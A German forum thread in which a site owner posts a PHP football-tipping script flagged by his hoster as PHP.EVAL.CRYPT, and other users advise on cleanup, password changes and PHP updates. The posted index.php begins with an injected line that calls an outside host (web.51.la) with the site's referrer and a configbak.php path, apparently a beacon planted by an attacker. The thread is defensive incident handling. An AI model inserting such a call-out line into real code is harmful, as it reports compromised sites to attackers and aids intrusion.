Schadcode im Script

Littlesteve · 23. Februar 2016

Habe gerade eine Mail von meinem Hoster bekommen mit folgendem Text

hiermit möchten wir Sie darüber informieren, dass unsere Antiviren-Software Schadcode auf dem Account ****** (Server: three) gefunden hat.

Folgende Scripte sind betroffen:
- *****/html/kicktippbuli/index.php (identifizierter Schädling: PHP.EVAL.CRYPT)
- *****/html/kicktippbulimobil/index.php (identifizierter Schädling: PHP.EVAL.CRYPT)

Jemand eine Ahnung wie das passieren kann und was ist jetzt am besten zu tun!?

je1977 · 23. Februar 2016

zeig mal deine Index... also der PHP.EVAL.CRYPT ist eigentlich nur möglich wenn man einen codierten Text in die datei injeziert und diesen dann mit der veralteten funktion eval() ausgibt/verarbeitet....

Beispiel: Joomla nach update korrupt? - CMS - Alfahosting-Forum

Somit gehe ich mal davon das entweder du oder eine andere Seite auf deinem server gehackt wurde und dieses Script in deine Index injeziert wurde.....

oldie · 23. Februar 2016

wenn der nur in der index ist Tausche die mit der Original Index aus
in der ist definitiv kein PHP.EVAL.CRYPT) enthalten
wenn du an die log files kommst suche darin nach PHP.EVAL.CRYPT dann weist du genau wann du den bekommen hast und auch wo der überall sitzt
und lass dir einen neuen FTP User mit Passwort erstellen

ganz vergessen dein hoster soll auf die PHP Version 5.4.45 oder höher updaten die Lücke in php wurde schon im September 2015 geschlossen

Littlesteve · 23. Februar 2016

hier ich denke mal es liegt an dem Code gleich nach <?php

@oldie wie könnte ich an die log files kommen? (Mein Hoster ist Alphahosting

PHP

<?php @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/configbak.php");
header('Content-Type: text/html; charset=utf-8');
###################################################################################################
# Dateiname: index.php
#
# Letzte Änderung der Datei / Last Change of File
# -----------------------------------------------
# Revision: $Rev: 373 $
# Datum / Date: $Date: 2012-09-28 03:21:10 +0200 (Fr, 28 Sep 2012) $
# Autor / Author: $Author: soeren $
#
#--------------------------------------------------------------------------------------------------
#
# BuLiTIPP 4 - Das Bundesliga Tippspielscript
#
# Copyright (C) 2007-2012 Sebastian Müller, Daniel Göhring, Sören Wiechert
#
# This program is free software; you can redistribute it and/or modify it under the terms of the
# GNU General Public License as published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program; if
# not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
# http://www.xcript.de
#
# !!! Do not remove link or copyright-notice !!!
#
###################################################################################################
define("|","|");
# Include-Dateien einbinden
require_once ("include/database.inc.php");
require_once ("include/config.inc.php");
require_once ("include/config.toastmessage.inc.php");
# Prüfen, ob eine database.inc.php für Entwicklungssystem existiert
if (@file_exists('../dev-database.inc_4.php'))
{
require_once ("../dev-database.inc_4.php");
}
# Prüfen, ob eine config.inc.php für Entwicklungssystem existiert
if (@file_exists('../dev-config_4.php'))
{
require_once ("../dev-config_4.php");
}
require_once ("include/login.inc.php");
require_once ("include/functions.inc.php");
// FusionCharts
require_once ("include/FusionCharts.php");
// XAJAX
require_once ("include/xajax/xajax_core/xajax.inc.php");
$CONFIG['PWDBY'] = "BuLiTipp - powered by "
."<a href='http://www.xcript.de'>"
."<span style='font-weight:bold;'>"
."XCRIPT.de</span></a>";
if ((isset($_SESSION['s_status']) && $_SESSION['s_rechte']) && (isset($_POST['msubmit']) || isset($_POST['mpicsubmit_x'])))
{
$msql = "UPDATE ". $tbl['config'] ." SET maintenance = ". ($_POST['maintenance'] == 1 ? 1 : 0);
mysql_query($msql);
}
$maintenance = 0;
$sql = "SELECT cr, version, maintenance FROM ". $tbl['config']
." WHERE id = 1;";
$query = mysql_query($sql);
$row = mysql_fetch_row($query);
$_SESSION['A'] = $row[0];
$_SESSION['B'] = $row[1];
$maintenance = $row[2];
if ($maintenance == 0 || (isset($_SESSION['s_status']) && $_SESSION['s_rechte']))
{
# XAJAX-Validate einbinden, wenn Seite "x" aufegrufen wurde
if ($_GET['site'] == "tippen" || $_GET['site'] == "admin_tippen") include_once("include/save.tips.inc.php");
}
# alle Usereingaben escapen
inputSecurity();
# URL escapen
$_SERVER['PHP_SELF'] = inputSecurity($_SERVER['PHP_SELF']);
# Checken, ob ein Navigationselement des Array angesprochen wurde
if ( ! isset($_GET['site']) || ! array_key_exists($_GET['site'], $nav))
{
$_GET['site'] = $defaultNav;
}
if ($maintenance == 0 || (isset($_SESSION['s_status']) && $_SESSION['s_rechte']))
{
# Session beenden, wenn User sich abmelden will -> Zur Startseite springen */
if ($_GET['site'] == "abmelden")
{
@session_destroy();
$_SESSION['s_status'] = 0;
$_GET['site'] == $defaultNav;
header("Location: index.php?site=" . $defaultNav);
}
# Session-Datum "lastAction" in Datenbank speichern (nur, wenn eingeloggt)
if (isset ($_SESSION['s_status']) && $_SESSION['s_status'])
{
if(isset($phpbb) && ($phpbb == 3 || $phpbb == 2))
{
$query = "UPDATE ".$tbl['user']
." SET lastaction=NOW()"
." WHERE user_id = '". mysql_real_escape_string($_SESSION['s_user'])
."' LIMIT 1";
}
else
{
$query = "UPDATE ".$tbl['user']
." SET lastaction=NOW()"
." WHERE id = '". mysql_real_escape_string($_SESSION['s_user'])
."' LIMIT 1";
}
$result = mysql_query($query);
}
# Besucherzähler aktualisieren
if (isset ($_SESSION['s_status']) && $_SESSION['s_status'])
{
# zwischen zwei Zugriffen desselben Users müssen mindestens x Sekunden
# (definiert in $skript['countertime']) liegen, bevor er erneut gezählt wird!
$query = "SELECT id FROM ".$tbl['counter']
." WHERE u_id=".$_SESSION['s_user']
." AND UNIX_TIMESTAMP(datum) > ".(time() - $skript['countertime']);
$sql = mysql_query($query);
if(mysql_num_rows($sql) == 0)
{
$query2 = "INSERT INTO ". $tbl['counter'] ."(u_id, datum)"
." VALUES (". mysql_real_escape_string($_SESSION['s_user']) .", NULL)";
$result = mysql_query($query2);
}
}
?>
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01//EN”>
<html>
<head>
<title><?php echo $CONFIG['PAGE']['TITLE']; ?><?php echo (isset($RUNTIME['PATH'][0]) ? strtoupper($RUNTIME['PATH'][0]) : ""); ?></title>
<link href="style/css/css.css" rel="stylesheet" type="text/css">
<link href="style/css/buttons.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" content="<?php echo $CONFIG['PAGE']['DESCRIPTION']?>" />
<meta name="author" content="<?php echo $CONFIG['PAGE']['AUTHOR']?>" />
<script type="text/javascript">
function openchat (url)
{
fenster = window.open(url, null, "width=800,height=600,status=yes,scrollbars=yes,resizable=yes");
fenster.focus();
}
</script>
<script type="text/javascript" src="style/js/functions.js"></script>
<link rel="stylesheet" type="text/css" media="all" href="include/jscalendar/calendar-blue.css" title="win2k-cold-1" />
<script type="text/javascript" src="include/jscalendar/calendar.js"></script>
<script type="text/javascript" src="include/jscalendar/lang/calendar-en.js"></script>
<script type="text/javascript" src="include/jscalendar/calendar-setup.js"></script>
<?php
// XAJAX einbinden
if (in_array($_GET['site'], array("tippen","admin_tippen")))
{
$xajax->printJavascript('include/xajax/');
?>
<script type="text/javascript">
// Ajax-Speicherung der Tipps
function saveTipps(id, userid)
{
xajax_save_tips
(
xajax.getFormValues('tippen', true, 'tipp_heim['+ id +']'),
xajax.getFormValues('tippen', true, 'tipp_gast['+ id +']'),
'tipp_check['+ id +']', 'tipp_gast['+ id +']', id, userid
);
}
</script>

Alles anzeigen

je1977 · 23. Februar 2016

also ich hab grad mal in meinem alfahosting account nachgeschaut also ich komme an die logs nicht ran... aber je nach Paket könnte es bei dir anders aussehen....

also die zeilen gehören definitiv nicht in die index.php, stellt sich noch die frage wo er sich noch reingeschrieben hat.... das sieht man in den logs oder man öffnet jede einzelne datei....

oldie · 23. Februar 2016

wegen dem log file deinen Hoster fragen auch wegen dem php update tausche die index aus das ist das sicherster im Nomen

je1977 · 23. Februar 2016

also ich hab damals bei einem bekannte die seite bereinigt.... und das tool Super Text Search benutz.... also webseite runterladen und dann mit Super Text Search nach dem String durchsurcht und alles per hand bereinigt.... leider ist das Tool nicht kostenlos.....

Littlesteve · 23. Februar 2016

über ftp sehe ich einen Ordner "log" @oldie meinst du den?

habe jetzt alphahosting mal dazu beauftrag php umzustellen, und habe mal alles index.php Dateien ausgetauscht.
war im em, wm im bulitipp und im bulitipp mobil überall das gleiche am Anfang drin...

edit:

@oldie hab die log Dateien nach was soll ich da suchen?

Karlnapp75 · 23. Februar 2016

@Littlesteve Du arbeitest nicht zufällig mit Filezilla ?

Littlesteve · 23. Februar 2016

nein mit ForkLift, warum @Karlnapp75

Karlnapp75 · 23. Februar 2016

Kann ich aus eigener Erfahrung nicht empfehlen, und so manch andere auch nicht. Filezilla

je1977 · 23. Februar 2016

Zitat von Littlesteve

über ftp sehe ich einen Ordner "log" @oldie meinst du den?

habe jetzt alphahosting mal dazu beauftrag php umzustellen, und habe mal alles index.php Dateien ausgetauscht.
war im em, wm im bulitipp und im bulitipp mobil überall das gleiche am Anfang drin...

edit:

@oldie hab die log Dateien nach was soll ich da suchen?

Alles anzeigen

schau mal wann die index.php das letzte mal geändert wurde und welche dateien zum selben zeitpunkt noch geändert wurden dann weißt du schon mal ob noch anderen dateien betrofeen sind meist schreibt sich ein php trojaner auch in noch viele weitere dateien

jumpM · 23. Februar 2016

auf keinen Fall, bei welchem FTP-Client auch immer, die Passwörter speichern..... Filezilla und Konsorten sind sonst sehr leicht angreifbar, da die Passwörter im KLARTEXT gespeichert werden!!!!!!

Am sichersten scheint mir noch WS-FTP zu sein! Aber wie gesagt... niemals die Passwörter speichern!

@ littlesteve..... durchsuche mal alle Dateien nach Deinem geposteten Schadcode! Normalerweise nistet der sich immer in ALLEN index.??? Dateien ein!!

Gruss
Robert

Littlesteve · 23. Februar 2016

@Karlnapp75 warum welche Probleme hattest du mit Forklift?
@jumpM habe jetzt alle index.*** Dateien in denen der Code vorhanden war diesen bereinigt, habe alle FTP Passwörter geändert, auf PHP 5.6 umgestellt, und alle SQL Passwörter geändert, mal schauen ob nun ruhe ist. - zumindest bis morgen, da schau i dann noch die logs durch wann noch auf welche Dateien zugegriffen wurde.

Danke an euch alle schon mal für eure tatkräftige Unterstützung!

je1977 · 24. Februar 2016

Zitat von jumpM

auf keinen Fall, bei welchem FTP-Client auch immer, die Passwörter speichern..... Filezilla und Konsorten sind sonst sehr leicht angreifbar, da die Passwörter im KLARTEXT gespeichert werden!!!!!!

Am sichersten scheint mir noch WS-FTP zu sein! Aber wie gesagt... niemals die Passwörter speichern!

@ littlesteve..... durchsuche mal alle Dateien nach Deinem geposteten Schadcode! Normalerweise nistet der sich immer in ALLEN index.??? Dateien ein!!

Gruss
Robert

Alles anzeigen

nein bei Filezilla werden keine Passwörter im KLARTEXT gespeichert... aber die Passwörter werden mit base64 verschlüsselt... welche sich sehr leicht wieder entschlüsseln lassen

jumpM · 24. Februar 2016

@Littlesteve
auch auf Deinem Lokalen Rechner die Dateien überprüfen!!!

@je1977
base64 ist ja fast wie Klartext

Gruss
Roebrt

je1977 · 24. Februar 2016

Zitat von jumpM

@Littlesteve
auch auf Deinem Lokalen Rechner die Dateien überprüfen!!!

@je1977
base64 ist ja fast wie Klartext

Gruss
Roebrt

Alles anzeigen

lol das stimmt

Littlesteve · 24. Februar 2016

@jumpM welche Dateien auf meinem eigenen rechner? Lade eigentlich nie schon geuploadetes wieder hoch

oldie · 24. Februar 2016

gehe einmal auf diese Seite und lese dir da einmal dieses durch Cross-Site-Scripting auf dem Rechner kann eigentlich nichts sein auser du hast ein Backup deiner Webseiten auf dem Rechner und wenn du alles was im logfile vom ftp zu der zeit was ein PHP.EVAL.CRYPT oder strangers.php enhält ( strangers.php ist das selbe wie PHP.EVAL.CRYPT ) bereinigt hast sollte alles wieder ok sein ja passworte sollte man im FTP Client nicht Speichern wenn du dir nicht sicher bist kannst du den Rechner ja mal mit dem Virenscanner scannen wird aber wahrscheinlich nichts bringen das findet kein Virenscanner

jumpM · 24. Februar 2016

Ich bin mir zwar nicht ganz sicher, aber meine in Erinnerung zu haben, dass bei einem Kunden über die FTP-Verbindung die Dateien auf dem lokalen Rechner auch manipuliert wurden!

Gruss
Robert

Tags